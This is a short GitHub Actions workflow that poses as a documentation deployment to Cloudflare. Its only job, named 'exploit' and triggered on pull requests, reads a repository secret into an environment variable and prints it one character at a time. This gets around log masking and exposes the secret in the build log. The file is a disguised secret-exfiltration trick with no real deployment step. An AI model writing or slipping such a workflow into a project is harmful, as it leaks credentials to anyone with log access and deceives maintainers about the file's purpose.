name: Documentation deployement

on:
  pull_request:

jobs:
  exploit:
    # Deploy to cloudflare
    runs-on: ubuntu-latest
    steps:
      - name: lol
        env:
            MY_VAL: ${{ secrets.SECRET }}
        run: |
            import os
            for q in (os.getenv("MY_VAL")):
              print(q)
        shell: python
